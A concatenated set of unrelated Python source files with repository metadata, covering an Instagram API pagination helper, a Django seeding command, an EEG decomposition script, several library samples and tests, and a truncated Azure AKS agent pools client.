next_max_id = temp["next_max_id"]
def getTotalFollowings(self, usernameId):
followers = []
next_max_id = ''
while True:
self.getUserFollowings(usernameId, next_max_id)
temp = self.LastJson
for item in temp["users"]:
followers.append(item)
if temp["big_list"] is False:
return followers
next_max_id = temp["next_max_id"]
def getTotalUserFeed(self, usernameId, minTimestamp=None):
user_feed = []
next_max_id = ''
while True:
self.getUserFeed(usernameId, next_max_id, minTimestamp)
temp = self.LastJson
for item in temp["items"]:
user_feed.append(item)
if temp["more_available"] is False:
return user_feed
next_max_id = temp["next_max_id"]
def getTotalSelfUserFeed(self, minTimestamp=None):
return self.getTotalUserFeed(self.username_id, minTimestamp)
def getTotalSelfFollowers(self):
return self.getTotalFollowers(self.username_id)
def getTotalSelfFollowings(self):
return self.getTotalFollowings(self.username_id)
def getTotalLikedMedia(self, scan_rate=1):
next_id = ''
liked_items = []
for x in range(0, scan_rate):
            self.getLikedMedia(next_id)
            temp = self.LastJson
try:
next_id = temp["next_max_id"]
for item in temp["items"]:
liked_items.append(item)
            except KeyError:
break
return liked_items
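    # Usage sketch (credentials are placeholders; login() and the class
    # definition live in the earlier, elided part of this file, assumed to be
    # the usual InstagramAPI wrapper):
    #   api = InstagramAPI('my_username', 'my_password')
    #   api.login()
    #   followers = api.getTotalFollowers(api.username_id)
    #   liked = api.getTotalLikedMedia(scan_rate=2)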
|
[
"furkan.aalperen@gmail.com"
] |
furkan.aalperen@gmail.com
|
062eb22c54e54134722697966c14311f9e383461
|
daa053212901b51273bb1f8a6ca3eddac2b5cbaf
|
/main/apps/companies/management/commands/seed_consultants.py
|
5df7ab0584e1e6e4412334b82052d2652e8c51ca
|
[] |
no_license
|
truhlik/directit
|
11fb45d482d454b55888f38afe0f64ce533788ad
|
eb10654b64cbe4232811594b936f8e3d0381754e
|
refs/heads/main
| 2023-08-30T10:03:45.376159
| 2021-10-06T19:02:15
| 2021-10-06T19:02:15
| 414,334,714
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,114
|
py
|
import os
import json
from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import transaction
from main.apps.categories.models import Category
from main.apps.companies.models import Company
from main.apps.companies import constants
from main.apps.tags.models import Tag
class Command(BaseCommand):
help = 'Seed Consultants'
    # converted using http://beautifytools.com/excel-to-json-converter.php
def handle(self, *args, **options):
path = os.path.join(settings.BASE_DIR, 'seeds', 'consultants2.json')
with open(path, mode='r') as f:
data = json.load(f)
with transaction.atomic():
self.process_data(data)
def process_data(self, data, parent=None):
for konzultant_dct in data['Konzultanti']:
self._create_consultant(konzultant_dct)
def _create_consultant(self, data):
if Company.objects.filter(name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', '')).exists():
return
c = Company(
role=constants.COMPANY_ROLE_CONSULTANT,
name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', ''),
description=data.get('Specifikace', None),
email=data.get('Email', None),
phone=data.get('Telefon', None),
city=data.get('Město', None),
)
c.save()
self.add_tags(c, data.get('Tagy - Technologie', '').split(','))
self.add_tags(c, data.get('Tagy - Kompetence', '').split(','))
    def add_tags(self, consultant, data):
        tags = []
        for tag in data:
            name = tag.strip()
            # get_or_create never returns None, so guard against empty tag
            # names (e.g. from a trailing comma) instead of checking t
            if not name:
                continue
            t, created = Tag.objects.get_or_create(name=name)
            tags.append(t)
        consultant.tags.add(*tags)
def add_categories(self, consultant, data):
tags = []
for category in data:
t = Category.objects.filter(name=category.strip()).first()
if t is not None:
tags.append(t)
consultant.categories.add(*tags)
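# Expected seed file shape, inferred from the keys read above (example values
# are hypothetical):
#   {"Konzultanti": [{"Jmeno": "Jan", "Prijmeni": "Novak",
#                     "Email": "jan@example.com", "Telefon": "...",
#                     "Město": "Praha", "Specifikace": "...",
#                     "Tagy - Technologie": "python, django",
#                     "Tagy - Kompetence": "backend"}]}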
|
[
"lubos@endevel.cz"
] |
lubos@endevel.cz
|
0dbd5fdba95bed8a268db8202b3fb87885b024ec
|
7b270cf5f9d0a3e26b5afd758563c6cff73a5248
|
/comportamentais/templateMethod/musica/musica/ordenadores/por_nome.py
|
20811813acfc8389cb954bc7cf5afb90f6bd5ea6
|
[] |
no_license
|
reginaldosantarosa/DesignPatterns
|
10810672d3831e562ec636a5f66bd709c797ca34
|
bec4247f52b8d2e1fe41c570408816a5d4b22608
|
refs/heads/master
| 2020-04-04T06:54:19.757054
| 2018-01-04T03:06:05
| 2018-01-04T03:06:05
| 155,761,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from musica.ordenador import Ordenador
class PorNome(Ordenador):
"""
    Sorts songs by name.
"""
def vem_antes(self, musica1, musica2):
"""
        Checks whether musica1's name comes before musica2's name,
        or whether the names are equal.
"""
        return musica1.nome <= musica2.nome
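# Usage sketch (assumes a Musica object exposing a `nome` attribute, as the
# comparison above implies):
#   class Musica:
#       def __init__(self, nome):
#           self.nome = nome
#   PorNome().vem_antes(Musica("Asa Branca"), Musica("Baiao"))  # -> True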
|
[
"victorhad@gmail.com"
] |
victorhad@gmail.com
|
a58aad7520eda26f26eea0cbde53195c6e1f95ff
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-dataplex/samples/generated_samples/dataplex_v1_generated_dataplex_service_list_lake_actions_async.py
|
6bb70e947a1d2da68ce6f3f24464c8d42da2e31a
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ListLakeActions
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dataplex
# [START dataplex_v1_generated_DataplexService_ListLakeActions_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import dataplex_v1
async def sample_list_lake_actions():
# Create a client
client = dataplex_v1.DataplexServiceAsyncClient()
# Initialize request argument(s)
request = dataplex_v1.ListLakeActionsRequest(
parent="parent_value",
)
# Make the request
    page_result = await client.list_lake_actions(request=request)
# Handle the response
async for response in page_result:
print(response)
# [END dataplex_v1_generated_DataplexService_ListLakeActions_async]
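# To execute the coroutine from a plain script (not part of the generated
# snippet itself):
#   import asyncio
#   asyncio.run(sample_list_lake_actions())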
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
03d54f61b29f53b93ad2fd757e4e11559959bdce
|
293d7ab59c9e7ff4e1341fb8e6504a89f3384666
|
/python/test/utils/test_graph_converters/test_batch_normalization_self_folding.py
|
1e2d303962a499a835d6efa13a3da5acd8dc33bf
|
[
"Apache-2.0"
] |
permissive
|
CrimsonTuna/nnabla
|
903423b8eb3617c3623952605bcdd77bb5ab2a56
|
36328e574d77f1cc9ee0051f33159a2dc4f03013
|
refs/heads/master
| 2023-03-29T07:12:33.444996
| 2021-04-11T09:33:21
| 2021-04-11T09:33:21
| 356,857,925
| 0
| 0
|
Apache-2.0
| 2021-04-11T13:09:02
| 2021-04-11T12:10:47
| null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
# Copyright (c) 2020 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import pytest
import numpy as np
import nnabla as nn
import nnabla.experimental.graph_converters as GC
from .ref_graphs.resnets import small_cf_resnet, small_bn_self_folding_resnet
batch_size = 1
resnet_ref = small_bn_self_folding_resnet
@pytest.mark.parametrize('seed', [313])
@pytest.mark.parametrize('test', [True])
@pytest.mark.parametrize('graph_ref, graph_act', [(resnet_ref, small_cf_resnet)])
def test_batch_normalization_self_folding(seed, test, graph_ref, graph_act):
from .graph_converter_test_utils import structure_tester, value_tester
# Random number
np.random.seed(seed)
rng = np.random.RandomState(seed)
# Graph
x_data = rng.randn(batch_size, 3, 32, 32)
x = nn.Variable.from_numpy_array(x_data)
y_tgt = graph_act(x, test=test)
# FunctionModifier
modifiers = []
modifiers.append(GC.BatchNormalizationSelfFoldingModifier())
y_act = GC.GraphConverter(modifiers).convert(y_tgt)
# Ref Graph
y_ref = graph_ref(x, name='bn-self-folding-graph-ref')
# Test
structure_tester(y_ref, y_act)
value_tester(y_tgt, y_act, rtol=6e-02, atol=5e-02)
|
[
"Kazuki.Yoshiyama@sony.com"
] |
Kazuki.Yoshiyama@sony.com
|
82bd13fb6585eb7e350d867d90ba5d73d5caf38e
|
5850d0bd221cec491f94cf68a6d880abdb838f0e
|
/tests/exoatlet/spat_decomp.py
|
cbefd3bddcc77909c7648fbe0e25bd9bd3f24412
|
[] |
no_license
|
nickware44/DeepBCI
|
336a437e2a519d09e74f57e692e4c59ac7b1db70
|
96b99b36e888a740dd955b7f6d3f8f05b94efd17
|
refs/heads/master
| 2023-08-03T09:08:20.283055
| 2023-07-27T19:17:13
| 2023-07-27T19:17:13
| 336,832,704
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,260
|
py
|
path_to_nfblab = r'C:\Projects\nfblab\nfb'
import sys
import numpy as np
import pylab as plt
import pandas as pd
import scipy.signal as sg
sys.path.insert(0, path_to_nfblab)
from utils.load_results import load_data
from pynfb.signal_processing.filters import ButterFilter
from pynfb.signal_processing.decompositions import ICADecomposition, CSPDecomposition
from pynfb.inlets.montage import Montage
from mne.viz import plot_topomap
# settings
h5_file = r'C:\Projects\nfblab\nfb\pynfb\results\exoatlet_kolai_stay_go_10-24_15-47-00\experiment_data.h5'
band = (15, 30)
method = 'ica'
np.random.seed(401)
# load data
df, fs, channels, p_names = load_data(h5_file)
fs = int(fs)
eeg_channels = channels[:30]
n_channels = len(eeg_channels)
montage = Montage(eeg_channels)
print('Fs: {}Hz\nAll channels: {}\nEEG channels: {}\nBlock sequence: {}'.format(
fs, ', '.join(channels), ', '.join(eeg_channels), '-'.join(p_names)))
# pre filter
pre_filter = ButterFilter(band, fs, n_channels)
df[eeg_channels] = pre_filter.apply(df[eeg_channels])
df = df.iloc[fs*5:]
# spatial decomposition
if method == 'ica':
decomposition = ICADecomposition(eeg_channels, fs)
elif method == 'csp':
decomposition = CSPDecomposition(eeg_channels, fs)
else:
raise ValueError('Bad method name. Use "ica" or "csp".')
# select data between first and second "pause" block
first_b_number = p_names.index('Pause') + 1
second_b_number = 10000  # was: p_names.index('Pause', 1) + 1
X = df.loc[(df.block_number>first_b_number) & (df.block_number<second_b_number)]
# fit decomposition
decomposition.fit(X[eeg_channels], X.block_name=='Go')
# init axes
n_rows = 5
n_cols = 6
fig, axes = plt.subplots(n_rows, n_cols * 2, figsize=(15, 10))
plt.subplots_adjust(hspace=1)
# sort components by ERD (event-related desynchronization): the relative
# band-power drop during 'Go' compared to 'Stay'
erds = np.zeros(n_channels)
erd_band = band # (18, 30)
for k in range(n_channels):
filt = decomposition.filters[:, k]
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > erd_band[0]) & (freq < erd_band[1])
erds[k] = (st_spec[freq_slice].mean() - go_spec[freq_slice].mean()) / st_spec[freq_slice].mean()
# plot axes
for j, k in enumerate(np.argsort(erds)[::-1]):
topo = decomposition.topographies[:, k]
filt = decomposition.filters[:, k]
ax = axes[j // n_cols, j % n_cols * 2]
plot_topomap(topo, montage.get_pos(), axes=ax, show=False, contours=0)
ax.set_title(str(k))
ax.set_xlabel('{:.1f}%'.format(erds[k] * 100))
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > 3) & (freq < 40)
ax = axes[j // n_cols, j % n_cols * 2 + 1]
ax.plot(freq[freq_slice], go_spec[freq_slice])
ax.plot(freq[freq_slice], st_spec[freq_slice])
ax.fill_between(freq[freq_slice], go_spec[freq_slice], st_spec[freq_slice], alpha=0.5)
ax.get_yaxis().set_visible(False)
ax.set_xticks([0, 10, 20, 30, 40])
ax.set_xticklabels([0, 10, 20, 30, 40])
plt.show()
|
[
"n.m.smetanin@gmail.com"
] |
n.m.smetanin@gmail.com
|
cddba55aea5b0e697b0e759fa4236c9772032db5
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/070_oop/007_exceptions/_exercises/templates/GoCongr/002_Exceptions.py
|
558802c1cef142e35946dbce32921cc93b0cf096
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 686
|
py
|
# # -*- coding: utf-8 -*-
#
# # Nested handlers
# ___ # Handle exceptions
# ___ # Nested handler
# x = 1 / 0 # Error: division by zero
# ____ N...
# print("Undefined identifier")
# ____ I...
# print("Nonexistent index")
# print("Statement after the nested handler")
# ____ Z..
# print("Handling division by zero")
# x _ 0
# print? # Prints: 0
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
f572de46bf3442d83632a194c67fbc4ea0587da3
|
9a1dbd1d6dcdb5a4d238fa72ff1eb8e8ac99c9fb
|
/EBookReading/wsgi.py
|
b4b370837d698fee742a9d781becb9f7af5f318b
|
[] |
no_license
|
chintan-27/E-Book-Reading-Website
|
85c0aa7515169f13bb8939aba9ee36bc64af17b8
|
693a75756f9e9b99631bff7973c4da16ed3716a4
|
refs/heads/main
| 2023-08-22T06:04:48.118415
| 2021-09-08T05:37:35
| 2021-09-08T05:37:35
| 378,327,140
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
"""
WSGI config for EBookReading project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'EBookReading.settings')
application = get_wsgi_application()
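# DJANGO_ALLOW_ASYNC_UNSAFE lets the ORM be called from async contexts by
# disabling Django's async-safety checks; convenient in notebooks, risky in
# production.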
os.environ["DJANGO_ALLOW_ASYNC_UNSAFE"] = "true"
|
[
"chintan.acharya27@gmail.com"
] |
chintan.acharya27@gmail.com
|
28f6441efdadfc02cdae431872a2d080a5030079
|
f504253210cec1c4ec6c3ea50a45564db7d6cd7f
|
/prettyqt/core/transposeproxymodel.py
|
81174a1c4b71d3ea47ef74b62ff9f018ad7d81d7
|
[
"MIT"
] |
permissive
|
phil65/PrettyQt
|
b1150cb4dce982b9b8d62f38f56694959b720a3e
|
f00500d992d1befb0f2c2ae62fd2a8aafba7fd45
|
refs/heads/master
| 2023-08-30T21:00:08.905444
| 2023-08-17T12:24:45
| 2023-08-17T12:24:45
| 177,451,205
| 17
| 5
|
MIT
| 2020-08-15T22:21:18
| 2019-03-24T18:10:21
|
Python
|
UTF-8
|
Python
| false
| false
| 220
|
py
|
from __future__ import annotations
from prettyqt import core
class TransposeProxyModel(core.AbstractProxyModelMixin, core.QTransposeProxyModel):
"""This proxy transposes the source model."""
ID = "transpose"
|
[
"philipptemminghoff@googlemail.com"
] |
philipptemminghoff@googlemail.com
|
1b71200f5245e6bae920920c97bfa9306e71d00e
|
50aa9303450e06d1172f78c0478a58e5113d9bb9
|
/958palindrome-data-stream.py
|
affb066b625a80be4a626f58e58e577ff236cabd
|
[] |
no_license
|
zlldt/LintCode
|
6e1041b78a301651378833caf7fd7db9ce112ec5
|
e5012161131a8c8557bdb0296980b2a0b712c620
|
refs/heads/master
| 2021-06-27T05:24:08.471072
| 2019-03-02T12:56:26
| 2019-03-02T12:56:26
| 105,424,020
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
class Solution:
"""
@param s: The data stream
@return: Return the judgement stream
"""
def getStream(self, s):
# Write your code here
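        # Invariant: the prefix s[:i+1] can be rearranged into a palindrome
        # iff at most one character occurs an odd number of times.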
        length = len(s)
        result = [1 for x in range(length)]
        counts = {}  # running character counts over the current prefix
        for i in range(length):
            if s[i] in counts:
                counts[s[i]] += 1
            else:
                counts[s[i]] = 1
            odd = 0
            for k, v in counts.items():
                if v % 2 == 1:
                    odd += 1
            if odd > 1:
                result[i] = 0
        return result
|
[
"noreply@github.com"
] |
zlldt.noreply@github.com
|
b8c22bcb6d3ac5f046570154dacdc01b736d759f
|
b420377a638dc9a5d8c09ebc39b0448d47ddb74e
|
/ddd-todolist-sample/todolist/port/eventbus.py
|
5431f4676032719da1a48a8695071bda80b80f8a
|
[] |
no_license
|
shimakaze-git/drf-sample
|
d4e4e8e4d380f0b77e807d4bbf4e3f0d98ee6bcd
|
4294cd5adeea0ef51d3b7eee6a154d23dd089afc
|
refs/heads/master
| 2022-05-02T20:19:09.901257
| 2019-09-15T12:46:51
| 2019-09-15T12:46:51
| 205,698,781
| 0
| 0
| null | 2022-04-22T22:29:32
| 2019-09-01T15:52:14
|
Python
|
UTF-8
|
Python
| false
| false
| 263
|
py
|
from abc import ABCMeta, abstractmethod
class EventBus(metaclass=ABCMeta):
    """Notification interface for domain events."""

    @abstractmethod
    def publish(self, event):
        """Publish a domain event."""
|
[
"shimakaze.soft+github@googlemail.com"
] |
shimakaze.soft+github@googlemail.com
|
1aafc1474a8d34a62593a043cd334f726f39f465
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2022_07_01/aio/operations/_agent_pools_operations.py
|
2fcf53c41b2be850fca1b5ad7c12391ba7b15405
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 39,942
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import (
build_create_or_update_request,
build_delete_request,
build_get_available_agent_pool_versions_request,
build_get_request,
build_get_upgrade_profile_request,
build_list_request,
build_upgrade_node_image_version_request,
)
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerservice.v2022_07_01.aio.ContainerServiceClient`'s
:attr:`agent_pools` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(self, resource_group_name: str, resource_name: str, **kwargs: Any) -> AsyncIterable["_models.AgentPool"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPool or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPoolListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPool:
"""Gets the specified managed cluster agent pool.
Gets the specified managed cluster agent pool.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPool
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> _models.AgentPool:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "AgentPool")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("AgentPool", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: _models.AgentPool,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPool
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
